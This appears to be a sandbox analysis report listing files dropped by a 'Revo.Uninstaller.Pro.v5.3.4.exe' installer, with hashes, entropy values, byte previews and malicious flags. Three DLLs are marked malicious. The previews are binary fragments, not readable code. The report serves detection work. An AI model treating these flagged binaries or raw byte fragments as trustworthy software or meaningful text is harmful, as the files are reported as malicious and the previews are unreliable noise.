                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):5.804946284177748
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                            MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                            SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                            SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                            SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 150 x 57 x 24, resolution 2835 x 2835 px/m, cbSize 25818, bits offset 54
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25818
                                                                                                                                            Entropy (8bit):2.1654611461266877
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:qfsz6YadoZ+HPwmWxS04WKWEFCidDIaThy:q0zDadRPNW0CICiyaThy
                                                                                                                                            MD5:414D457C540048704D144FB2A0D2BC73
                                                                                                                                            SHA1:5021B23ABACB37EDC3E099132A9FF83A0AD5E3E9
                                                                                                                                            SHA-256:B0537E5F4FE7E8FAC0C093BFB83E7F633EF4F8DA6649F73329EA1B2777956DE2
                                                                                                                                            SHA-512:C1B90F31950F3AC5CD65BDDCFCAEFB4A722EC6F91327437734FE05C8989004F2268662DF5631FDB6A6F23E28080BABCBCFBBE112F0EBB3B850D17395484FF355
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:BM.d......6...(.......9.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9728
                                                                                                                                            Entropy (8bit):5.157714967617029
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                                                                                                            MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                                                                                                            SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                                                                                                            SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                                                                                                            SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7168
                                                                                                                                            Entropy (8bit):5.295306975422517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                                                                                                            MD5:11092C1D3FBB449A60695C44F9F3D183
                                                                                                                                            SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                                                                                                            SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                                                                                                            SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14300
                                                                                                                                            Entropy (8bit):4.0538420518958445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:8I3O/0+JPRZPXiPyNhiv2wBApVYO8N78nVvN9QGzD8:j9UDSPyNhiv2wBApVYO8NaxN9QGzD8
                                                                                                                                            MD5:0E7277E0D003E84326ECF8D4793C70B0
                                                                                                                                            SHA1:DB2A6EDC05678FFF798B72DB5EACB2D5634E4A90
                                                                                                                                            SHA-256:BCBB4D8AF5A3EFFDE3D47DEE88E1BC9E768C3335210634968A8B76A2CFCAB95D
                                                                                                                                            SHA-512:65E9C61BE80EEBB8BBC4770949FC2E8F6FDA7FCE8C209F5226F76A226AEE85E1089FCF70A2C7F16367FCB7F5457E9F5F9F4DC79BD9D7E733BE88BAA5381EA8FE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...@..........Wg.....................|.e....................3.Wg.........|.e....i...&lZ{........G.o.o.g.l.e. .C.h.r.o.m.e.........0.5...1.0...2.0.2.3........5C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e....*C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.....G.o.o.g.l.e. .C.h.r.o.m.e.....G.o.o.g.l.e. .L.L.C.....H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.....6.5.5...2.7. .M.B..H.(........".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.1.1.7...0...5.9.3.8...1.3.4.\.I.n.s.t.a.l.l.e.r.\.s.e.t.u.p...e.x.e.". .-.-.u.n.i.n.s.t.a.l.l. .-.-.c.h.a.n.n.e.l.=.s.t.a.b.l.e. .-.-.s.y.s.t.e.m.-.l.e.v.e.l. .-.-.v.e.r.b.o.s.e.-.l.o.g.g.i.n.g.....1.1.7...0...5.9.3.8...1.3.4............AS.O.F.T.W.A.R.E.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.C.u.r.r.e.n.t.V.e.r.s.i.o.n.\.U.n.i.n.s.t.a.l.l.\.G.o.o.g.l.e. .C.h.r.o.m.e....................../..........M.i.c.r.o.s.o.f.t. .E.d.g.e.....
                                                                                                                                            Process:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):322
                                                                                                                                            Entropy (8bit):5.182911679867894
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:qcdpfjvAbIQ+q6s25YvtgEgXF1dkrCQHLBkQjvAbIQ+q6s25YvtgEgXF1dkrCSn:nPvadft2XF1dkrCQHOsvadft2XF1dkrZ
                                                                                                                                            MD5:9A3415A7324A8A36284C3694A1C7ED17
                                                                                                                                            SHA1:4FD9DE79A6AA1F825179D27AFF7218504403D8F2
                                                                                                                                            SHA-256:EE70C9E2B208FD50BFD1FAB8F07D0F68057B631457EDBB143F1B429D480E0EBA
                                                                                                                                            SHA-512:73ECDDFC6D4CB52FFAC9FEA1F3C95C7E6D86ACE143F854450BACA5B4A04902697F183D500074D966C6A2BE08EA22FEA01554937CAE3C9DCCCEABA1C46DA5E32B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[09.12.2024 11:39:25.0483] (VSProjectPro.cpp 501) --- Starting (v.5.3.4) --- cmd line = "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc..[09.12.2024 11:39:36.0829] (VSProjectPro.cpp 501) --- Starting (v.5.3.4) --- cmd line = "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"..
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.727245037238303
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cIRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:DQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:2975A234FD9EF97AE4D5927547FF042F
                                                                                                                                            SHA1:F42456A14F3F7FB80E5058BF5DDB2CE60F44777F
                                                                                                                                            SHA-256:F60D6E07532558DAD4B39D33B4949556543DEBA8F4AC40340FF57919B7A37409
                                                                                                                                            SHA-512:C71F33474B893EDE5FA28FEF5F4E0FBDDB87E638D8EF6928C9CCA3B159F812E70E86032E42876E43667A97E4AC35658FDBC860CB07A4828E2BC41A716227DAF6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ...N..XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.7273313271682333
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cdARG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:pQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:6E6C5F4EA9F724C63107CB5D3B3A7AE1
                                                                                                                                            SHA1:DE72662290B805369B4DD9F604491C86F0BD2247
                                                                                                                                            SHA-256:0B36C5C79B725728C6046FB4698FDC6EE78DC2D73D3DD9F7B3DFF86556DB36B3
                                                                                                                                            SHA-512:B8364C3C04B87B2B48C8E030F942B0F783DA4CF02AF00D597D89DF1D38FFE0259703329F353DD8A4CAF591D2209C70A18BF9A817EEE72E206910989AACA27309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ.....XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.7274433900446304
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cBRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:WQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:892FBB3D7F3DE18B7BACEC004742D285
                                                                                                                                            SHA1:106FC29F48948C9547A36B3AAB86A81B57C5988A
                                                                                                                                            SHA-256:1F691234BA139ABA6AD4470E328D18621747E290808CF2985B60B95C9EB51434
                                                                                                                                            SHA-512:5319DEC42EC7324CA6112BB3783067D95B3AAD89AE40F3AB3F88E2A88ED1934445CCD1C24B79B4B33D4D2001FF1167D3ABF57AE3F35E1B8C7FAF255D5B9AFA32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ.../x.XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.727245037238303
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cIRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:DQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:2975A234FD9EF97AE4D5927547FF042F
                                                                                                                                            SHA1:F42456A14F3F7FB80E5058BF5DDB2CE60F44777F
                                                                                                                                            SHA-256:F60D6E07532558DAD4B39D33B4949556543DEBA8F4AC40340FF57919B7A37409
                                                                                                                                            SHA-512:C71F33474B893EDE5FA28FEF5F4E0FBDDB87E638D8EF6928C9CCA3B159F812E70E86032E42876E43667A97E4AC35658FDBC860CB07A4828E2BC41A716227DAF6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ...N..XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.727245037238303
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cIRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:DQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:2975A234FD9EF97AE4D5927547FF042F
                                                                                                                                            SHA1:F42456A14F3F7FB80E5058BF5DDB2CE60F44777F
                                                                                                                                            SHA-256:F60D6E07532558DAD4B39D33B4949556543DEBA8F4AC40340FF57919B7A37409
                                                                                                                                            SHA-512:C71F33474B893EDE5FA28FEF5F4E0FBDDB87E638D8EF6928C9CCA3B159F812E70E86032E42876E43667A97E4AC35658FDBC860CB07A4828E2BC41A716227DAF6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ...N..XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.727245037238303
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cIRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:DQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:2975A234FD9EF97AE4D5927547FF042F
                                                                                                                                            SHA1:F42456A14F3F7FB80E5058BF5DDB2CE60F44777F
                                                                                                                                            SHA-256:F60D6E07532558DAD4B39D33B4949556543DEBA8F4AC40340FF57919B7A37409
                                                                                                                                            SHA-512:C71F33474B893EDE5FA28FEF5F4E0FBDDB87E638D8EF6928C9CCA3B159F812E70E86032E42876E43667A97E4AC35658FDBC860CB07A4828E2BC41A716227DAF6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ...N..XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 03:58:00 2024, mtime=Mon Dec 9 15:39:27 2024, atime=Mon Dec 2 03:58:00 2024, length=25576112, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1158
                                                                                                                                            Entropy (8bit):4.4956778512660005
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8mzid/0GdV6SRNV/A+2KrNRUdo3qAWdo3V6ETm:8mzid/DdMkPI+2q7Udo3qdo3n
                                                                                                                                            MD5:4D1F0D2BB034A0FBC3D6A4BCFE5673C8
                                                                                                                                            SHA1:A955487FE13D28839032B5EA604A57583A59C090
                                                                                                                                            SHA-256:BA6E6473D2BCF6D740F63730B78B778AC4BBC5B170AB7F6F7E5DCC3E3D9C469A
                                                                                                                                            SHA-512:39EB68D25A0B61EA8CA385CDB8E7BF5DD2B6896429EB7CE0B5018FCEC277167428B425932302E051D11F371C8C4F98166FDE3385DC7A4386D6E3F6B597DB4E65
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.... ....<..vD...P..XJ...<..vD...B...........................P.O. .:i.....+00.../C:\.....................1......Y...PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y...VSREVO~1..L......Y.Y......(........................V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y...REVOUN~1..Z......Y.Y......(....................U. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....l.2..B...Y@' .REVOUN~2.EXE..P......Y@'.Y......(........................R.e.v.o.U.n.i.n.P.r.o...e.x.e.......r...............-.......q.............9......C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe..[.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.R.e.v.o.U.n.i.n.P.r.o...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X..
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 9 15:39:15 2024, mtime=Mon Dec 9 15:39:15 2024, atime=Mon Dec 9 15:39:15 2024, length=179964, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1148
                                                                                                                                            Entropy (8bit):4.509725402147515
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8mMQid/0GdV6SRghbAY2VEdo3thLdo3VVm:8mMQid/DdMkghMY2VEdo3thLdo33
                                                                                                                                            MD5:D3A04B5569577FA3E5176BA822668099
                                                                                                                                            SHA1:8DC274B42A0B9E51B5924B023A87DE53615F4402
                                                                                                                                            SHA-256:F6C5713C6B0F2BD85A110F855E506C99FDC5B8F5766AE3BF95F3E5A0AD79BE56
                                                                                                                                            SHA-512:B9F74A94B4EE7F6DDEF9201BC4C3C8386554E23BA27A61A013EF428A94DB26845F93C67F20B25B03C615196C74C942FCC1CF6FF0E705D61983E31E3A170E9C36
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.... ....i..XJ.....XJ.....XJ...............................P.O. .:i.....+00.../C:\.....................1......Y...PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y...VSREVO~1..L......Y.Y......(........................V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y...REVOUN~1..Z......Y.Y......(....................U. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....h.2......Y. .UNINST~1.EXE..L......Y.Y......)......................:.U.n.i.n.s.t.a.l.l...e.x.e.......p...............-.......o.............9......C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe..Y.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.U.n.i.n.s.t.a.l.l...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X.......99254
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40
                                                                                                                                            Entropy (8bit):3.3454618442383204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:FkWXltmP+NeQC:93C
                                                                                                                                            MD5:A539950A8AE173D3F1455B1257D4167F
                                                                                                                                            SHA1:70B2E73B4AA800CDFAFBFBC219B011B6DEA42E48
                                                                                                                                            SHA-256:F393157E6DB91DE54F20DD3906C073B84A916B3961D3B7A6A1386474AEA7EF9A
                                                                                                                                            SHA-512:C70CAE153C4708C0A1EEF1EC23DCE0CF6EE487F3DBA6DC697938A206395D8A84EE5B40BAE4EAFA4EE0C74E8E1586D3DA3F1542686102D9FE704D38075173B20A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:sdPC......................C.z..K..9=.p..
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 03:58:00 2024, mtime=Mon Dec 9 15:39:19 2024, atime=Mon Dec 2 03:58:00 2024, length=25576112, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1122
                                                                                                                                            Entropy (8bit):4.532793309251221
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8m4id/0GdV6SRNVAA+2Krado3qAWdo3V6ETm:8m4id/DdMkPX+2qado3qdo3n
                                                                                                                                            MD5:A07B37C64C18AD16D0DA42DBF1B1B919
                                                                                                                                            SHA1:BF1F1AA7F44E28EEFC970557BB1001BEB1F5E85F
                                                                                                                                            SHA-256:62E7BAE26CE95E6EA235EBF13DA0475B3A922306DC94C8D3D333849BA1144B47
                                                                                                                                            SHA-512:9A8FAD76A3ADB0440D81E4E1DAAAB6334D0ABAC14170B0CDFCCD4543C9CB128D173D5D948C98A56DE4645C3AFFF98BC11DA5916DD204C2179A54B4E670C3823D
                                                                                                                                            Malicious:false
